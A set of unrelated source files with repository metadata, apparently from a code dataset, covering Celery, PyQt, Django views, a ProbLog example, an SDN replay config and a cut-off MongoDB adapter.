c8c2388aacf9a93e788c79f3183bb7a4304a4f40 | c6ee7be1479797788dd9f9d3a29c0e76ea020db8 | /apscheduler_yqt/MyTestFile/16celery_rabbitmq/01/test.py | 9f8dba3fe0e8b813e291b135506fa9d9d5a7a897 | [] | no_license | hikekang/apscheduler_yqt | 2966e7231fff1f81c4fa4a75459cf638592aae6a | 0d30c2ef721b8ffeba98dca6b2441613b4ed608d | refs/heads/master | 2023-08-17T05:19:34.345553 | 2021-09-26T03:21:11 | 2021-09-26T03:21:11 | 406,217,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | #!/usr/bin/python3.x
# -*- coding=utf-8 -*-
"""
Time : 2021/8/24 14:24
Author : hike
Email : hikehaidong@gmail.com
File Name : test.py
Description:
Software : PyCharm
"""
from tasks import add
result=add.delay(4,4)
print(result)
print(result.get()) | [
"38242754+hikekang@users.noreply.github.com"
] | 38242754+hikekang@users.noreply.github.com |
ca733c4f0d08db52a07a496051f24168657ab96c | 6b3f1b032092be8878251c0e4de79332a43e5772 | /qt1.py | a8d36e3e1b365568846fa2af5799088a522f9225 | [] | no_license | NanshyVargas/library | 8bb1c2c7b14f083c0dcfaffaae8873ff09138916 | f9acef61d0c3d0fad67f1c108999140140b4ef2a | refs/heads/master | 2022-11-14T17:16:21.178895 | 2020-07-08T08:17:59 | 2020-07-08T08:17:59 | 276,699,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | import sys
import proto1
from PyQt5.QtWidgets import (QWidget, QLabel, QTextEdit, QGridLayout, QApplication, QPushButton, QDesktopWidget)
class Example(QWidget):
def templateAction(self, userId, bookId):
'''Автозаполнение заранее определенными значениями'''
self.textEdit2.insertPlainText(str(userId))
self.textEdit3.insertPlainText(str(bookId))
def __init__(self, conn, cursor):
super().__init__()
self.initUI()
self.bookid = None
self.userid=None
self.cursor = cursor
self.conn = conn
def initUI(self):
self.I = 0
label1 = QLabel('Логи')
label2 = QLabel('Id книги')
label3 = QLabel('Id пользователя')
self.textEdit1 = QTextEdit()
"""Сюда пишем логи"""
self.textEdit1.setReadOnly(True)
"""Нельзя редактировать"""
self.textEdit2 = QTextEdit()
"""Для ввода id книги"""
self.textEdit3 = QTextEdit()
"""Для ввода id читателя"""
btn1 = QPushButton('Список должников')
btn2 = QPushButton('Взять книгу')
btn3 = QPushButton('Вернуть книгу')
btn4 = QPushButton('Очистить')
btn5 = QPushButton('Закончить ввод')
btn1.clicked.connect(self.buttonClicked1)
btn2.clicked.connect(self.buttonClicked2)
btn3.clicked.connect(self.buttonClicked3)
btn4.clicked.connect(self.textEdit1.clear)
"""Стираем все логи с экрана"""
btn5.clicked.connect(self.buttonClicked5)
grid = QGridLayout()
grid.setSpacing(10)
#Расположение элементов
grid.addWidget(label1, 0, 0, 1, 3)
grid.addWidget(self.textEdit1, 1, 0, 1, 4)
grid.addWidget(btn1, 2, 0)
grid.addWidget(btn2, 2, 1)
grid.addWidget(btn3, 2, 2)
grid.addWidget(btn4, 2, 3)
grid.addWidget(label2, 3, 1, 1, 1)
grid.addWidget(self.textEdit2, 4, 1, 1, 1)
grid.addWidget(label3, 3, 2, 1, 1)
grid.addWidget(self.textEdit3, 4, 2, 1, 1)
grid.addWidget(btn5, 5, 2)
self.templateAction(1, 1)
self.setLayout(grid)
x = QDesktopWidget().availableGeometry().center().x()
y = QDesktopWidget().availableGeometry().center().y()
width = 500
height = 500
self.setGeometry(x-width/2, y-height/2, 500, 500)
self.setWindowTitle('Review')
self.show()
def buttonClicked1(self):
"""Вывод списка должников"""
self.textEdit1.insertPlainText(proto1.list_of_debtors(proto1.Bookmas, proto1.Usermas))
def buttonClicked2(self):
"""Вывод логов для операции "Взять книгу" """
self.textEdit1.insertPlainText(proto1.bring_book(proto1.Bookmas, proto1.Usermas, self.bookid, self.userid, self.conn, self.cursor))
def buttonClicked3(self):
"""Вывод логов для операции "Вернуть книгу" """
self.textEdit1.insertPlainText(proto1.return_book(proto1.Bookmas, proto1.Usermas, self.bookid, self.userid, self.conn, self.cursor))
def buttonClicked5(self):
"""Закончить ввод, обработать данные"""
value = self.textEdit2.toPlainText()
self.bookid = int(value)
value = self.textEdit3.toPlainText()
self.userid = int(value)
conn, cursor = proto1.openconn()
app = QApplication(sys.argv)
ex = Example(conn, cursor)
sys.exit(app.exec_())
| [
"nanshy@yandex.ru"
] | nanshy@yandex.ru |
f5b339362038a0ce066bc2209c1d3c55c647852f | 445dafaf2f1341e556d0bcdff11e1b902b562d45 | /turtle/__main__.py | 087091d67c3b1269a0c814dc0dc2cdb81ba8bea4 | [] | no_license | bojinyao/exam-generation | 3102911cfcec440ff5fca619d83542561694e77d | 1db83a6aabf83f2887912ad698175a4295e21232 | refs/heads/master | 2021-01-08T13:48:22.585247 | 2020-04-25T05:39:09 | 2020-04-25T05:39:09 | 242,044,420 | 1 | 2 | null | 2020-04-25T05:39:10 | 2020-02-21T03:19:48 | Python | UTF-8 | Python | false | false | 938 | py | import argparse, sys, json
from config import default_configuration
from classes import *
#---------------- program arguments ----------------
def parse_arguments():
parser = argparse.ArgumentParser(description="Speed up exam question")
parser.add_argument("-i", "--infile", nargs='?', metavar='', type=argparse.FileType('r'), default=None, help="path to configuration file if provided")
parser.add_argument("-o", "--outfile", nargs='?', metavar='', type=argparse.FileType('w+', encoding="UTF-8"), default=sys.stdout, help="path to output file if provided")
parser.add_argument('-q', '--num_questions', metavar='', type=int, default=1, help='number of questions to generate at once. Default 1')
return parser.parse_args(), parser
def main():
args, parser = parse_arguments()
s = speedUp(default_configuration)
print(json.dumps(s.constructQuestions(), indent=4))
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | bojinyao.noreply@github.com |
aac7077bedabdf788b4d780e379f3b969de0eee9 | d28112305d39c043f1c26ebb66954b9ae9c43eee | /accounts/views.py | 8e3c0cfee76873f50c333ab1bfadbb0b391049b5 | [] | no_license | srkumar10/btre_project | 5addd72e5ba9ab1519a9b9b1fa1c6efd8a6e94e0 | 7f26a559c15f9d004f535c15a57d4f6d9c800053 | refs/heads/master | 2022-06-24T21:20:25.061830 | 2020-05-04T02:21:09 | 2020-05-04T02:21:09 | 261,059,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,866 | py | from django.shortcuts import render, redirect
from django.contrib import messages, auth
from django.contrib.auth.models import User
from contacts.models import Contact
def register(request):
if request.method == "POST":
# Get form values
first_name = request.POST['first_name']
last_name = request.POST['last_name']
username = request.POST['username']
email = request.POST['email']
password = request.POST['password']
password2 = request.POST['password2']
# Check if passwords match
if password == password2:
# Check username
if User.objects.filter(username=username).exists():
messages.error(request, 'That username is taken')
return redirect('register')
else:
if User.objects.filter(email=email).exists():
messages.error(request, 'That email is being used')
return redirect('register')
else:
# Looks good
user = User.objects.create_user(username=username, password=password, email=email,
first_name=first_name, last_name=last_name)
# Login after register
# auth.login(request, user)
# messages.success(request, 'You are now logged in')
# return redirect('index')
user.save()
messages.success(request, 'You are now registered and can log in')
return redirect('login')
else:
messages.error(request, 'Passwords do not match')
return redirect('register')
# Register User
# messages.error(request, 'Testing error message')
# return redirect('register')
else:
return render(request, 'accounts/register.html')
def login(request):
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request, user)
messages.success(request, 'You are now logged in')
return redirect('dashboard')
else:
messages.error(request, 'Invalid credentials')
return redirect('login')
else:
return render(request, 'accounts/login.html')
def logout(request):
if request.method == "POST":
auth.logout(request)
messages.success(request, 'You are now logged out')
return redirect('index')
def dashboard(request):
user_contacts = Contact.objects.order_by('-contact_date').filter(user_id=request.user.id)
context = {
'contacts': user_contacts
}
return render(request, 'accounts/dashboard.html', context)
| [
"rsunkara@ouc.com"
] | rsunkara@ouc.com |
82750c37529a17c849542e16db8487e588de28bf | 5edf9131cfe45f8f901aaed62f6528fc3774df3b | /clevros/primitives.py | 7825a022aca00f76abeda9520c47a14231aaef90 | [] | no_license | hans/clevr-oneshot | a07147ea4b9a17d3006904f07b2e5d93dbfc97e5 | e2aecee1718443714a9aad897bdbe973a974f4b9 | refs/heads/master | 2021-07-10T00:20:04.831270 | 2019-02-27T18:16:14 | 2019-02-27T18:26:24 | 105,565,520 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,485 | py | from frozendict import frozendict
import operator
class Event(object):
def __init__(self):
pass
def __eq__(self, other):
if isinstance(other, Event):
return True
return False
def __hash__(self):
return hash(Event)
def __getitem__(self, attr):
return EventOp(self, getattr, attr)
def __getattr__(self, attr):
if attr.startswith("__"):
# Avoid returning EventOps when client is trying to access a dunder
# method!
raise AttributeError
return EventOp(self, getattr, attr)
def __call__(self):
# Dummy method which allows us to use an instance of this class as a
# function in the ontology.
return None
def __str__(self):
return "<event>"
__repr__ = __str__
class EventOp(object):
"""
Lazy-evaluated operation on an event object.
"""
def __init__(self, base, op, *args):
self.base = base
self.op = op
self.args = tuple(args)
def __hash__(self):
return hash((self.base, self.op, self.args))
def __eq__(self, other):
"""
Compares two `EventOp` instances. To do lazy equality checks, use
`EventOp.equals`.
"""
return hash(self) == hash(other)
def equals(self, other):
"""
Builds a lazy equality check op. To compare `EventOp` instances, use `==`.
"""
return EventOp(self, operator.eq, other)
def __getitem__(self, attr):
return EventOp(self, getattr, attr)
def __getattr__(self, attr):
if attr.startswith("__"):
# Avoid returning EventOps when client is trying to access a dunder
# method!
raise AttributeError
return EventOp(self, getattr, attr)
def __add__(self, other):
return EventOp(self, operator.add, other)
def __sub__(self, other):
return EventOp(self, operator.sub, other)
def __mul__(self, other):
return EventOp(self, operator.mul, other)
def __rmul__(self, other):
return EventOp(self, operator.mul, other)
def __lt__(self, other):
return EventOp(self, operator.lt, other)
def __gt__(self, other):
return EventOp(self, operator.gt, other)
def __contains__(self, el):
return EventOp(self, operator.contains, el)
def __call__(self, *args, **kwargs):
return EventOp(self, operator.methodcaller, (*args, frozendict(kwargs)))
def __str__(self, verbose=False):
if verbose:
op_str = repr(self.op)
else:
if hasattr(self.op, "__name__"):
op_str = self.op.__name__
elif hasattr(self.op, "__call__"):
op_str = self.op.__class__.__name__
else:
op_str = str(self.op)
return "EventOp<%s>(%s, %s)" % \
(op_str, self.base, ", ".join(str(arg) for arg in self.args))
def __repr__(self):
return self.__str__(verbose=True)
class Object(object):
def __init__(self, name=None, **attrs):
self.attrs = frozendict(attrs)
self.name = name or self.attrs.get("type")
def __hash__(self):
return hash((self.name, self.attrs))
def __eq__(self, other):
return hash(self) == hash(other)
def __str__(self):
return self.name
def __repr__(self):
return "O(%s: %s)" % (self.name, self.attrs)
def __getattr__(self, attr):
if attr.startswith("__"):
# Don't muck with dunder methods
raise AttributeError
return self[attr]
def __getitem__(self, attr):
return self.attrs[attr]
class Collection(object):
def __init__(self, characteristic):
self.characteristic = characteristic
def __eq__(self, other):
return hash(self) == hash(other)
def __hash__(self):
# TODO not sure about the semantics!
return hash(self.characteristic)
def fn_unique(xs):
true_xs = [x for x, matches in xs.items() if matches]
assert len(true_xs) == 1
return true_xs[0]
def fn_cmp_pos(ax, manner, a, b):
sign = 1 if manner == "pos" else -1
return sign * (a["3d_coords"][ax()] - b["3d_coords"][ax()])
def fn_ltzero(x): return x < 0
def fn_and(a, b): return a and b
def fn_eq(a, b):
if hasattr(a, "equals"):
return a.equals(b)
elif hasattr(b, "equals"):
return b.equals(a)
else:
return a == b
def fn_not(a):
if not isinstance(a, bool):
raise TypeError()
return not a
## Ops on collections
def fn_set(a): return isinstance(a, Collection)
def fn_characteristic(a): return a.characteristic
def fn_ax_x(): return 0
def fn_ax_y(): return 1
def fn_ax_z(): return 2
## Ops on objects
def fn_cube(x): return x.shape == "cube"
def fn_sphere(x): return x.shape == "sphere"
def fn_donut(x): return x.shape == "donut"
def fn_pyramid(x): return x.shape == "pyramid"
def fn_hose(x): return x.shape == "hose"
def fn_cylinder(x): return x.shape == "cylinder"
def fn_apple(x): return x.type == "apple"
def fn_cookie(x): return x.type == "cookie"
def fn_book(x): return x.type == "book"
def fn_water(x): return x.type == "water"
def fn_object(x): return isinstance(x, (frozendict, dict))
def fn_vertical(x): return x.orientation == "vertical"
def fn_horizontal(x): return x.orientation == "horizontal"
def fn_liquid(x): return x.state.equals("liquid")
def fn_full(x): return x.full
# Two-place ops on objects
def fn_contain(x, y):
if isinstance(x, (Event, EventOp)) or isinstance(y, (Event, EventOp)):
return x.contain(y)
return x in y
def fn_contact(x, y):
if isinstance(x, (Event, EventOp)):
return x.contact(y)
elif isinstance(y, (Event, EventOp)):
return y.contact(x)
# TODO implement the actual op rather than the lazy comp representation :)
return True
## Ops on events
class Action(object):
def __add__(self, other):
return ComposedAction(self, other)
def __eq__(self, other):
return isinstance(other, self.__class__) and hash(self) == hash(other)
@property
def entailed_actions(self):
"""
Return all actions which are logically entailed by this action.
"""
return []
class Constraint(object):
# TODO semantics not right -- subclasses don't take multiple constraints. We
# should have a separate `ComposedConstraint` class
def __init__(self, *constraints):
constraints_flat = []
for constraint in constraints:
if constraint.__class__ == Constraint:
# This is a composite constraint instance -- merge its containing
# constraints.
constraints_flat.extend(constraint.constraints)
else:
constraints_flat.append(constraint)
self.constraints = frozenset(constraints_flat)
def __add__(self, other):
return Constraint(self.constraints | other.constraints)
def __hash__(self):
return hash(self.constraints)
def __eq__(self, other):
return hash(self) == hash(other)
def __str__(self):
return "Constraint(%s)" % (", ".join(map(str, self.constraints)))
__repr__ = __str__
class Contain(Constraint):
def __init__(self, container, obj):
self.container = container
self.obj = obj
def __hash__(self):
return hash((self.container, self.obj))
def __str__(self):
return "%s(%s in %s)" % (self.__class__.__name__, self.obj, self.container)
class Contact(Constraint):
def __init__(self, *objects):
self.objects = frozenset(objects)
def __hash__(self):
return hash((self.objects))
def __str__(self):
return "%s(%s)" % (self.__class__.__name__, ",".join(map(str, self.objects)))
class ComposedAction(Action):
def __init__(self, *actions):
if not all(isinstance(a, Action) for a in actions):
raise TypeError()
self.actions = actions
def __hash__(self):
return hash(tuple(self.actions))
def __str__(self):
return "+(%s)" % (",".join(str(action) for action in self.actions))
__repr__ = __str__
class NegatedAction(Action):
def __init__(self, action):
if not isinstance(action, Action):
raise TypeError()
self.action = action
def __hash__(self):
return hash(("not", self.action))
def __str__(self):
return "!(%s)" % self.action
__repr__ = __str__
class Move(Action):
def __init__(self, obj, dest, manner):
self.obj = obj
self.dest = dest
self.manner = manner
def __hash__(self):
return hash((self.obj, self.dest, self.manner))
def __eq__(self, other):
return hash(self) == hash(other)
def __str__(self):
return "%s(%s -> %s, %s)" % (self.__class__.__name__, self.obj, self.dest, self.manner)
__repr__ = __str__
class Transfer(Move):
pass
class Put(Action):
def __init__(self, event, obj, manner):
self.event = event
self.obj = obj
self.manner = manner
def __hash__(self):
return hash((self.event, self.obj, self.manner))
def __str__(self):
return "%s(%s,%s,%s)" % (self.__class__.__name__, self.event, self.obj, self.manner)
__repr__ = __str__
class Eat(Action):
def __init__(self, event, food):
self.event = event
self.food = food
def __hash__(self):
return hash((self.event, self.food))
def __str__(self):
return "%s(%s)" % (self.__class__.__name__, self.food)
class ActAndEntail(Action):
"""
Joins an action with entailments about the event.
"""
def __init__(self, action, entail):
self.action = action
self.entail = entail
def __hash__(self):
return hash((self.action, self.entail))
class StateChange(Action): pass
class CausePossession(StateChange):
def __init__(self, agent, obj):
self.agent = agent
self.obj = obj
def __hash__(self):
return hash((self.agent, self.obj))
def __str__(self):
return "%s(%s <- %s)" % (self.__class__.__name__, self.agent, self.obj)
__repr__ = __str__
| [
"jon@gauthiers.net"
] | jon@gauthiers.net |
f7b5dd02dbf094465c47ff7b2ec320345c7b8abc | 053ae946aaae8c6e99beb1ed82486cbb0fadd6af | /theory/problog/ex-poisson.py | 8c960003d9828526d8f2aebbfe80120f27bdff05 | [] | no_license | pasqualedem/Graph-DB-Problog-Linker | 250fba3d12c635460d0e5bbe3e51286b4be1432d | e93d63c5dc3b0114c8080b28f1811051bea564e5 | refs/heads/master | 2022-04-05T05:13:38.600372 | 2020-02-17T16:53:55 | 2020-02-17T16:53:55 | 236,478,525 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 12 17:03:58 2020
@author: PasqualeDeMarinis
"""
from problog import get_evaluatable
model = """
% urnball_poisson.pl
:- use_module('posson.py').
num_balls(X) :-
findall(N, between(1,3,N), L),
poisson_probs(L, 2, Probs),
select_weighted(0, Probs, L, X, _).
0.9::color(Ball, blue); 0.1::color(Ball, green).
draw_ball(D, C) :-
num_balls(TBs),
findall(Bs, between(1,TBs,Bs), L),
select_uniform(D, L, B, _),
color(B, C).
query(num_balls(_)).
evidence(draw_ball(0, green)).
query(draw_ball(1, green)).
"""
rappr = get_evaluatable().create_from(model)
r = rappr.evaluate()
print(r)
| [
"pasquale199876@hotmail.it"
] | pasquale199876@hotmail.it |
f5f865c9272a8c8739c77dd0d809040085eede11 | c0d31ed53b37085ca301c05ad579be90373de9ee | /fly/views.py | b0f9e573f7d2eb2638a8587cc1737fde6e0e955d | [] | no_license | likerberi/simpleDjango | cc34a62be1c1cd3aa7fb67ff1f81298461992347 | f95eacd4e276d55a5b754049597ff3f6930a4aed | refs/heads/master | 2020-05-28T09:56:50.309017 | 2019-05-30T06:56:20 | 2019-05-30T06:56:20 | 188,963,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,315 | py | from django.shortcuts import render
from django.http import HttpResponse, Http404, HttpResponseRedirect
from .models import Fly, Passenger
from django.urls import reverse
# Create your views here.
def index(request):
context = {
"flys": Fly.objects.all()
}
return render(request, "fly/index.html", context)
def fly(request, fly_id):
try:
fly = Fly.objects.get(pk=fly_id)
except Fly.DoesNotExist:
raise Http404("Fly Does not exist.")
context = {
"fly" : fly,
"passengers": fly.passengers.all(),
"non_passengers": Passenger.objects.exclude(flys=fly).all()
}
return render(request, "fly/fly.html", context)
def book(request, fly_id):
try:
passenger_id = int(request.POST["passenger"])
passenger = Passenger.objects.get(pk=passenger_id)
fly = Fly.objects.get(pk=fly_id)
except KeyError:
return render(request, "fly/error.html", {"message": "No Selection."})
# no passenger data
except Fly.DoesNotExist:
return render(request, "fly/error.html", {"message": "No flys"})
except Passenger.DoesNotExist:
return render(request, "fly/error.html", {"message": "No passengers."})
passenger.flys.add(fly)
return HttpResponseRedirect(reverse("fly", args=(fly_id,)))
| [
"likerberi97@gmail.com"
] | likerberi97@gmail.com |
da48bb5148055e48dab9afb47e713fa76d83c045 | 906bdc4eb499fa1551278ebef50c7f9b621bbdbe | /24/test_silver.py | 31f64d01618746cf8ad610cd75c71d2bcfaae20d | [] | no_license | slovb/advent_of_code_2017 | 042033047ed1c04f36faea4de747695b2c3e5c6e | 5389f79eeb5f880407e44337bec16d5287e3de4c | refs/heads/master | 2020-04-09T04:48:56.160875 | 2017-12-25T12:29:58 | 2017-12-25T12:29:58 | 160,037,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | import unittest
import silver as target
class Tester(unittest.TestCase):
def test_ex(self):
components = [
(0, 2),
(2, 2),
(2, 3),
(3, 4),
(3, 5),
(0, 1),
(10, 1),
(9, 10)
]
self.assertEqual(target.solve(components), 31)
if __name__ == '__main__':
unittest.main()
| [
"zlowbie@gmail.com"
] | zlowbie@gmail.com |
104c925bd6314e637d48b9ae42bec366a68dc578 | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /snapshot_demo_updated_link_failure/interactive_replay_config.py | 8829a94407e3072b87c050c553795abd1f1be3a8 | [] | no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pox.py --verbose openflow.discovery forwarding.l2_multi_synthetic_link_failure_crash sts.util.socket_mux.pox_monkeypatcher openflow.of_01 --address=__address__ --port=__port__', label='c1', address='127.0.0.1', cwd='pox')],
topology_class=MeshTopology,
topology_params="num_switches=3",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=True,
kill_controllers_on_exit=True)
control_flow = InteractiveReplayer(simulation_config, "experiments/snapshot_demo_updated_link_failure/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: ""
| [
"cs@cs.berkeley.edu"
] | cs@cs.berkeley.edu |
f8aa759652de4937cc1be1d4bf1ccaa8df8e77ee | d4dcdeac84a06abc6e94ccf053c22d9edf83f316 | /election/views.py | f5b7d08b89ab333ef75a8bd6a01dddf4f2ad8917 | [] | no_license | maliha3/Onlinevotingnew | 29b721a8ace5938b488d53dce406d6f5cc8f9a4b | af365e59e9741a7f5e6897710daf6244c4cab86c | refs/heads/master | 2023-05-31T02:02:14.604024 | 2021-06-14T17:53:30 | 2021-06-14T17:53:30 | 376,911,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,174 | py | import pandas as pd
from user import forms
from user.models import CanInfo, DummyCitizenInfo
from django.shortcuts import redirect, render
from django.contrib.auth.decorators import login_required
from .models import Election
from user.models import DummyCitizenInfo,CanInfo
from vote.models import Vote
from .forms import *
from django.db.models import Q
# Create your views here.
@login_required
def election(request, elecName):
votearea = DummyCitizenInfo.objects.get(email = request.user.email)
electionobj = Election.objects.get(elec_name=elecName)
admincandidates = CanInfo.objects.filter(elec_name = elecName)
if(electionobj.elec_type=='national'):
candidates=CanInfo.objects.filter(elec_name = elecName, voting_area = votearea.area_name)
else:
# mayorcandidates=CanInfo.objects.filter(elec_name = elecName, candidate_type = 'MAYOR')
candidates=CanInfo.objects.filter(Q(elec_name = elecName) & Q(voting_ward = votearea.ward_number)|Q(voting_ward = 'M'))
print(admincandidates)
canlistname = []
canlistphoto = []
candiparty = []
canlisttype = []
canlistnid = []
counter = []
canlistward =[]
canlistarea = []
admincanlistname = []
admincanlistphoto = []
admincandiparty = []
admincanlisttype = []
admincanlistnid = []
admincounter = []
admincanlistward =[]
admincanlistarea = []
for j in range(len(admincandidates)):
dummyvar=DummyCitizenInfo.objects.get(nid = admincandidates[j].nid)
admincanlistname.append(dummyvar.name)
admincanlistphoto.append(dummyvar.picture)
admincanlisttype.append(admincandidates[j].candidate_type)
admincandiparty.append(admincandidates[j].party_name)
admincanlistnid.append(admincandidates[j].nid)
admincanlistward.append(admincandidates[j].voting_ward)
admincanlistarea.append(admincandidates[j].voting_area)
admincounter.append(Vote.objects.filter(elec_name=elecName,candidate=admincandidates[j]).count())
for i in range(len(candidates)):
dummyvar=DummyCitizenInfo.objects.get(nid = candidates[i].nid)
canlistname.append(dummyvar.name)
canlistphoto.append(dummyvar.picture)
canlisttype.append(candidates[i].candidate_type)
candiparty.append(candidates[i].party_name)
canlistnid.append(candidates[i].nid)
canlistward.append(candidates[i].voting_ward)
canlistarea.append(candidates[i].voting_area)
counter.append(Vote.objects.filter(elec_name=elecName,candidate=candidates[i]).count())
print(canlistname)
flag = Vote.objects.filter(elec_name=elecName, user=DummyCitizenInfo.objects.get(email=request.user.email), vote_status= True)
context = {
'uData' : DummyCitizenInfo.objects.get(email = request.user.email),
'getElectionData': CanInfo.objects.filter(elec_name = elecName),
'electionTable' : Election.objects.get(elec_name = elecName),
'elec_name' : elecName,
'admincanlistcity' : zip(admincanlistname,admincanlisttype,admincanlistward,admincounter),
'admincanlistnational' : zip(admincanlistname,admincandiparty,admincanlistarea,admincounter),
'canlist' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
'canlist1' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
'canlist2' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
'canlist3' : zip(canlistname,canlisttype,canlistward,counter),
'nationalcanlist' : zip(canlistname,candiparty,canlistarea,counter),
'voteFlag' : flag,
'votearea' : votearea
}
if request.method == 'POST':
et = Election.objects.get(elec_name = elecName)
if request.POST.get('actionOp') == 'active':
et.elec_status = request.POST.get('actionOp')
et.save()
if request.POST.get('actionOp') == 'cancle':
Election.objects.get(elec_name = elecName).delete()
CanInfo.objects.filter(elec_name = elecName).delete()
if request.POST.get('actionOp') == 'ended':
et.elec_status = 'ended'
et.save()
if request.POST.get('MAYOR') and request.POST.get('COUNCILLOR') and request.POST.get('RESERVED'):
vModel1 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='MAYOR').get(nid=request.POST.get('MAYOR')))
vModel2 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='COUNCILLOR').get(nid=request.POST.get('COUNCILLOR')))
vModel3 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='RESERVED').get(nid=request.POST.get('RESERVED')))
vModel1.save()
vModel2.save()
vModel3.save()
if request.POST.get('MP'):
vModel1 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='MP',elec_name=elecName).get(nid=request.POST.get('MP')))
vModel1.save()
checkAccess = DummyCitizenInfo.objects.get(email=request.user.email)
if checkAccess.elec_Worker == True:
return redirect('election-worker')
else:
return redirect('dashboard')
elif Election.objects.filter(elec_name = elecName, elec_type = 'national'):
return render(request, 'home/national.html', context)
elif Election.objects.filter(elec_name = elecName, elec_type = 'city'):
return render(request, 'home/city.html', context)
@login_required
def electionWorker(request):
context = {
"pElectionList" : Election.objects.filter(elec_status='pending'),
"aElectionList" : Election.objects.filter(elec_status='active'),
"userInfo" : DummyCitizenInfo.objects.get(email=request.user.email),
"clec_createForm" : createElectionForm(),
}
if request.method == 'POST':
if len(request.FILES) !=0:
df = pd.read_csv(request.FILES['cvc_file'])
if request.POST.get('elec_type') == 'national':
for i in range(len(df)):
can = CanInfo(
name= df['name'][i],
nid = df['nid'][i],
elec_name=request.POST.get('elec_name'),
candidate_type=df['candidate_type'][i],
party_name = df['party_name'][i],
voting_area = df['Area Name'][i],
)
can.save()
elect = Election(
elec_name = request.POST.get('elec_name'),
elec_type = request.POST.get('elec_type')
)
elect.save()
else:
for i in range(len(df)):
can = CanInfo(
name= df['name'][i],
nid = df['nid'][i],
elec_name=request.POST.get('elec_name'),
candidate_type=df['candidate_type'][i],
voting_ward = df['Ward Number'][i],
)
can.save()
elect = Election(
elec_name = request.POST.get('elec_name'),
elec_type = request.POST.get('elec_type')
)
elect.save()
return redirect('election-worker')
return render(request, 'home/elec-worker.html', context)
def aricves(request):
context = {
'eAcrives' : Election.objects.filter(elec_status= 'ended')
}
return render(request, 'home/arcives.html', context)
def publicResult(request, elecName):
electionobj = Election.objects.get(elec_name=elecName)
candidates=CanInfo.objects.filter(elec_name = elecName)
canlistname = []
canlistphoto = []
candiparty = []
canlisttype = []
canlistnid = []
counter = []
canlistward =[]
canlistarea = []
for i in range(len(candidates)):
dummyvar=DummyCitizenInfo.objects.get(nid = candidates[i].nid)
canlistname.append(dummyvar.name)
canlistphoto.append(dummyvar.picture)
canlisttype.append(candidates[i].candidate_type)
candiparty.append(candidates[i].party_name)
canlistnid.append(candidates[i].nid)
canlistward.append(candidates[i].voting_ward)
canlistarea.append(candidates[i].voting_area)
counter.append(Vote.objects.filter(elec_name=elecName,candidate=candidates[i]).count())
#flag = Vote.objects.filter(elec_name=elecName, user=DummyCitizenInfo.objects.get(email=request.user.email), vote_status= True)
context = {
#'uData' : DummyCitizenInfo.objects.get(email = request.user.email),
'getElectionData': CanInfo.objects.filter(elec_name = elecName),
'electionTable' : Election.objects.get(elec_name = elecName),
'elec_name' : elecName,
'canlist' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
'canlist1' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
'canlist2' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
'canlist3' : zip(canlistname,canlisttype,canlistward,counter),
'nationalcanlist' : zip(canlistname,candiparty,canlistarea,counter),
}
if Election.objects.filter(elec_name = elecName, elec_type = 'national'):
context['nTable'] = True
return render(request, 'home/arciverus.html', context) | [
"malihazaman@Malihas-MacBook-Pro.local"
] | malihazaman@Malihas-MacBook-Pro.local |
37546155301527fa3625423441749a7d2847e9f0 | 6a89644ca479e1980b88c768bf868a1422fdee8b | /poptimizer/data/adapters/db.py | 0535645631c3afb07276e3d0291c9c74ede11c70 | [
"Unlicense"
] | permissive | chekanskiy/poptimizer | 82e664c2208b54cac63e0c5dac0680ec038da702 | e5d0f2c28de25568e4515b63aaad4aa337e2e522 | refs/heads/master | 2022-12-20T15:09:40.111678 | 2020-10-06T17:11:49 | 2020-10-06T17:11:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,381 | py | """Реализации сессий доступа к базе данных."""
import asyncio
from typing import Iterable, Optional, Tuple, Union
import pandas as pd
from motor import motor_asyncio
from poptimizer.data.adapters import logger
from poptimizer.data.ports import outer
# Коллекция для одиночный записей
MISC = "misc"
def _collection_and_name(table_name: Union[outer.TableTuple, outer.TableName]) -> Tuple[str, str]:
"""Формирует название коллекции и имя документа."""
collection: str = table_name.group
name = table_name.name
if collection == name:
collection = MISC
return collection, name
